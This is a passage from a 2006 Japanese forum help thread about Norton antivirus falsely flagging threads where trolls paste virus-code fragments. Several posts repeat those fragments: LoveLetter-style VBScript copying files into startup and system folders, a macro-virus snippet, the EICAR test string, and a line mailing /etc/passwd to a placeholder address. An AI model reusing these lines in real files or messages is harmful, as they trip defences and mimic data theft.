以前の説明をwikiに誘導する形にしてみました。
559:ひよこ名無しさん
06/06/04 10:03:06
u
560:ひよこ名無しさん
06/06/04 10:27:58
保守
561:ひよこ名無しさん
06/06/05 19:23:06
jane doe view使ってるんですが、
ノートントラップのウィルスコード貼られたスレ取得障害になったり、
ここのPC初心者板なんかはノートン切らないと来れません。
それで対策として書かれてる見て、
ノートンアンチウィルスの手動&オートの除外項目から、
viewのLogsフォルダを両方除外したんですが、
それでも駄目なままです。
他に何をしないといけないんでしょうか?
562:ひよこ名無しさん
06/06/05 19:44:30
ここを読み直せ
563:ひよこ名無しさん
06/06/06 18:14:41 yssu6HWa
ウィルスコードに反応したせいで、取得したログが消滅するのについては、
ログフォルダを除外すればいけるわけですが、
最近のウィルスコードは進化してて、
Autoblockで侵入感知反応してしまって、
2chの該当IPをアク禁にしてしまってるようなんです。
この場合の対応はどのようにすればよいでしょうか?
ノートン切らないと、ログを取得するどころか、
スレ単位、はなはだしくは板単位でアクセスすらできません。
564:ひよこ名無しさん
06/06/06 18:17:44
>>563
リカバリしろデブ。
565:ひよこ名無しさん
06/06/06 18:30:21
どの専ブラでも基本はログと書き込みフォルダを
除外すればおk?
566:ぴーこ名無しさん
06/06/07 01:17:37
>>563
URLリンク(mickey.mirv.net)
>>565
URLリンク(ansitu.xrea.jp) の3番目
詳しくはお使いの2ちゃんねるブラウザのヘルプ・スレ等で確認してください。
567:ひよこ名無しさん
06/06/07 18:58:51
>>564
リカバリしろデブ。
568:<body onload=window()>
06/06/08 03:34:49
p + w * 10 <br> End Sub <br>
LOVE-LETTER-FOR-YOU
569:ひよこ名無しさん
06/06/08 03:36:10
>568
570:ひよこ名無しさん
06/06/08 04:18:57
さっきこのウィルスソースが2ちゃん掲示板に埋められてるのを見てしまったら、
ウィルスソフトは反応しなかったのですが、
いきなり2ちゃん掲示板の行間が広くなってしまいました。
ネットから接続を切って履歴とかTemporaryInternetFileとか全部削除してから
ウィルスチェックをしましたが反応なし。
これはブラウザの表示は変になったけど感染はしなかったということで大丈夫なのでしょうか?
ブラウザは専ブラじゃなくIEで、ウィルスソフトはソースネクストのウィルスセキュリティです。
571:ひよこ名無しさん
06/06/08 04:21:40
570ですが補足です。
表示したスレは
スレリンク(newsplus板)l50
で、ここの>>5にそのソースが書いてありました。
572:ひよこ名無しさん
06/06/08 04:23:53
>>570
行間が広くなるのはシリア語ブラクラじゃないのか?
573:ひよこ名無しさん
06/06/08 04:27:58
>>571
5の最後の行にシリア語書いてあるね
574:ひよこ名無しさん
06/06/08 04:48:56
>>572-573
レスありがとうございます。
シリア語ブラクラだと行間が広くなる以外の被害はないですか?
初めて聞いたもので>シリア語ブラクラ
さきほど念のためもう一度ウィルスチェックしましたがウィルス発見なしでした。
ブラウザと閉じるときにInternetTemporaryFileの中身を削除する設定にしてあるのですが
こちらも念のためInternetTemporaryFileの中身も確認してみましたが
cookieファイルとfaviconファイルのみ格納されていました。
「html」「htm」がなくなってれば大丈夫ですかね?
575:ひよこ名無しさん
06/06/08 05:11:57
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
| ○。 |
ノノ) 从
( i从〓〓 〓〓.从
.从-=・=- -=・=-从
从从. l 从)
(从.l∴ ∨ ∴从人)
(人人|∴ ヽ .ー===-' ./.∴..从人) <無職元祖ぶる殿 ◆U/gDqFZzsY蚤
(人人|∴∴!  ̄ !∴∴l从人)
(人人|∴∴!. !∴∴l从人)
(人人|∴∴!. !∴∴l从人)
..(人人人_人____人_.人人人)
〔ノ二二,___ __,二二ヽ〕
|:::::::::::::::::::::::::ヽ゜ ゜/:::::::::::::::::::::::::/
〉::::::::: :::::::::::::〉__∩__〈:::::::::::::: ::::::::〈
|:::::::::::::::::::::::/\ ̄/ヽ:::::::::::::::::::::/
〔:::::::::::::::::::::/ ノ ~ヽ ヽ::::::::::::::::::|
ヽ:::::::::::::::::/ /:::::::::::: \ ):::::::::::::::::::ゝ
ノ:::::::::::::::::::| |_~─ー= - | |~~~/
576:ひよこ名無しさん
06/06/12 11:39:57
このスレだと反応しないのは何で?
577:ひよこ名無しさん
06/06/13 14:13:25
特定のスレに擬似ウィルスコード貼り付ける奴がいて困ってます。
ノートンのauto protect と手動スキャンで、
専ブラを除外するように設定してるんですが、スレを開くとエラーになってしまいます。
URLリンク(ansitu.xrea.jp)
このサイトに書かれてる、信頼のアドレスを追加の設定はしました。
エラーのログを取得して、弾かれて、
有志さんの誤反応無効化スクリプトで書き換えて、
時間たつのまってから閲覧。しかもレス番はズレでわけわかめ
という状態です。
何かうまく弾く方法はないんでしょうか?
578:ひよこ名無しさん
06/06/13 20:49:00
>>577
きちんと専ブラのログを除外する
579:577
06/06/14 13:32:40
>>578
僕の分かるように1~10までしっかりすべてと教えて下さい。
さっさと、教えろボケこのやろう
∧_∧
,,,,,,,,,,,,,,,∧,,∧ ( ´∀`) \
~′,,,,,,,,,,ミ,,゚Д゚彡 / つ℃━━━━━━
UU""""U U ~(_つ つ \へへ_ |
――――――――| . |
| |
|へ__ . |
| |
へ____へ__/___へへ__へ______ |
|
| |
(( | ))
| |
| |
|
|~~~ヽ`∀´>ヾ〕∈
580:ひよこ名無しさん
06/06/17 22:54:14
>>2ё
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz) type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
581:ひよこ名無しさん
06/06/18 17:52:54 k4PxNBCi
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz) type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))
582:ひよこ名無しさん
06/06/18 18:33:56
583:ひよこ名無しさん
06/06/20 00:04:58
時々スレを転々としてると、急に変な改行になるんですが(文と文の隙間が全部空いてしまう)
これってウイルスに侵されてるのでしょうか?
584:ひよこ名無しさん
06/06/20 01:18:31
l'vヘ
ハ ┌( ;/ ト, ,、 rヘ r'^ナrジ-z
__}ヽ,__ (ヽ/ス_r^フしz,り い)n/イr~^′
'っヾ、r'__ |レ'ノ_C'入彳勺ソメろ_j/し-,_
`フ ヾ勹_| <_r' !|刀_」r''>||/⌒(_rヘ-‐'
<_ゝし||フぅ(ひzメ__ゝ'l !'そ
~zヾ|て 、l レ^ //'| |'~
| | ヽl| // }|
| :! || | | ,/ ,'
| :{. || | |/ / すいません、ちょっと通りますよ・・・
l !|| | | /
ヽ ヽ.|/ //
_,r)_ j (_,( ciz
,ノこ_- __,ーヽ ん|Zゥ レz zjそ_
} ... 丿 ろ、,_!|乙7ムLそ/し-z
ノ""'' 一( `う.l !シ/ア了//_⊂,
/、__ ヽ ^'| |~//,/_ソ ハr^
/ ...... ーl | |// //ノ
/~"' 、__/ ,,,...} |/ /// _Jv ,、 _,、
{' _ `y′ 一 / r'~(_ノ z'jく|!ぞぅンそ
人 =/‐- ハ 丿" ''( ぅY||/ソ'/`′
ヽ '' / __,, / / ‐- ''') | レ'//
'∨ X. }''' ....ノ ノムxく
j ー/ /== ノ'ヽ rご ー(
/=‐ r'´-ヽ } ー/'''' { ,ノ'' y' ...)
,' _,, 人 ''"`、 ノ.. '' ノ`ヽ ''"ヽ / ー人.... (
{ー / \ -'} / / \'''}` ('' ィ´ \_ヽ
ハ 〈 )八 ( f )ハ. )ノ _)ノ
ヽ ) (( )ノ / ー'′
585:dirsystem&"\MSKernel32.vbs
06/06/20 01:55:47
>>568
586:あぼ~ん
06/06/20 01:56:38
>>568 >>585
587:ひよこ名無しさん
06/06/20 02:15:03
>>583
シリア語ブラクラ
これを使うといい。
URLリンク(www.geocities.jp)
588:ひよこ名無しさん
06/06/20 23:24:54
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz) type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
589:ひよこ名無しさん
06/06/21 12:18:24 nQsDrOZ+
このスレに貼ってあるソースは大丈夫なのですか?
例えば>>580-581とか、>>588とか…
このスレだと反応ないんですが、何か特別なのでしょうか?
590:ひよこ名無しさん
06/06/21 14:23:42 fhcCUte2
テスト
591:ひよこ名無しさん
06/06/21 20:24:45
>>589
心配しすぎだと思うんです(><)
これが動いたら2chは大騒ぎになっちゃうと思うんです(><)
592:ひよこ名無しさん。
06/06/21 23:50:37
NGワードあぼ~んすればおk
593:ひよこ名無しさん
06/06/22 20:26:16 l9A+tZtH
誘導されてきました
導入しているマカフィーでスキャンかけても何の反応もなかったんですが、
ノートンのオンラインスキャンやってみると
感染ファイルが二個みつかって
C:\Program Files\gikoNavi\Log\2ch\aasaloon\Folder.idx は Bloodhound.Exploit.6 に感染しています。
C:\Program Files\gikoNavi\Log\2ch\aasaloon\subject.txt は Bloodhound.Exploit.6 に感染しています。
と言う表示が出ました。
これは危険なんでしょうか。それともただのウィルスコード?
594:ひよこ名無しさん
06/06/22 20:27:57
>>593
ただのウィルスコード
これで消せる。
URLリンク(www.geocities.jp)
595:ひよこ名無しさん
06/06/22 20:28:13
>>593
ノートンがvbsウィルスのソースに誤反応3
スレリンク(pcqa板)
596:ひよこ名無しさん
06/06/22 20:28:47
>>594
cen乙
597:ひよこ名無しさん
06/06/22 20:30:04
>>594-596
レス早いなw
598:ひよこ名無しさん
06/06/22 20:41:25
粘着してリロードしながら監視してるんだろ?www
599:ひよこ名無しさん
06/06/22 20:44:02 l9A+tZtH
>>594
ありがとうございます。
見分けるコツみたいなものはあるんですか?
600:ひよこ名無しさん
06/06/22 22:08:53
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz) type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
601:ひよこ名無しさん
06/06/23 00:17:41
ノートンがvbsウィルスのソースに誤反応3
スレリンク(pcqa板)
テンプレにでも入れるか・・・?
脳豚使うなら自力で何とかしろよ・・・
602:ひよこ名無しさん
06/06/23 00:18:16
誤爆
603:ひよこ名無しさん
06/06/23 18:23:08
___ゲームキャラ板でもモニカワイイモニカ様___
スレリンク(gamechara板)
このスレを開くと閲覧できないどころか
一回再起動しないとgame10鯖に繋がらなくなる障害が出るんですが
NGコードとかどう打って対処すればいいのですか?
604:ひよこ名無しさん
06/06/23 18:23:47 6hQn7KgH
使用2chブラウザは Jane Doe Styleです。
605:ひよこ名無しさん
06/06/23 18:25:27
>>604
回答めんどいからこのスレ内検索して
606:ひよこ名無しさん
06/06/23 22:47:16
>>599
専用ブラウザでスレを取得した「だけ」で反応したら間違いなく誤反応なので心配無用。
スレに貼られたURLをクリックして反応したならウィルスの疑いあり。
てゆーか、やたらとクリックしちゃダメ。
607:ひよこ名無しさん
06/06/28 16:58:31
age
608:ひよこ名無しさん
06/06/29 15:09:12 C6iUe2mV
Your attention,Please. みなさまに申し上げます
fire drill 火災避難訓練
609:ひよこ名無しさん
06/06/29 19:41:48
age
610:ひよこ名無しさん
06/06/29 21:38:29
スレリンク(pcqa板:111-番)
111 名前:ひよこ名無しさん 投稿日:2006/06/29(木) 21:33:23 ID:P5JFBD43
キャップもらってパスワードもらって、名前欄に書き込んでも、
○★ にならなくて○◆になってしまうんですが、どうしてでしょうか
113 名前:愛新覚羅 ◆WjkbiI..A2 投稿日:2006/06/29(木) 21:34:04 ID:???
>>111
ウイルシかな
611:ひよこ名無しさん
06/06/30 22:56:15 2Lq/lYYu
テスト
612:ひよこ名無しさん
06/07/01 00:07:11 Dt6nkhA2
スレリンク(arc板:16番)
コレって書き込んだ本人がウイルスに感染しているって事でしょうか?
613:ひよこ名無しさん
06/07/01 00:08:55
>>612
ノートン先生を誤反応させるためにわざと貼ってるんだよ
614:612
06/07/01 00:39:41 Dt6nkhA2
ただ、これ書いた人がカードゲームのトレードスレに
自分のメルアド出してブログバレしてます
615:ひよこ名無しさん
06/07/01 23:18:07
複雑な自爆では?
616:ひよこ名無しさん
06/07/02 19:36:03 ytfN9V0/
ノートン2006でAutoprotectの設定で、ログのフォルダを除外したいのですが、
それらしい項目が分かりません。
Norton AntiVirusオプションの項目ではないのでしょうか?
617:ひよこ名無しさん
06/07/02 20:00:00 ytfN9V0/
事故解決しました。
618:ひよこ名無しさん
06/07/03 19:55:32 pfnK+d5L
専ブラ(Jane)での書き込みの妨害も先生の仕業?
更新かけて解決するのであれば(期限切れ)、
してやらんでもないのだが・・・。
619:ひよこ名無しさん
06/07/03 22:30:42
>>618
> 更新かけて解決するのであれば(期限切れ)、
それはないな。FW(が入っているのであれば)一時的に切ってみるしか
620:618
06/07/03 23:15:21 pfnK+d5L
>>619
いや、プラウザからなら書き込めるんですよ。
ノートン有効→一部の板の閲覧不可(IE、専ブラ共に)
無効→共に閲覧は可能 専ブラでの書き込みが不可。
ってわけでこの板だけは、IEからしか書き込めないんです・・・。
まぁ、通信を許可すれば解決なんでしょうが・・・。
いろいろやってみます。 どもでした。
621:ひよこ名無しさん
06/07/04 02:40:17
まったくの初心者ですが
ノートンインターネットセキュリティー2006での誤反応対策を教えてください
既出でしたらアンカーでもいいのでお願いします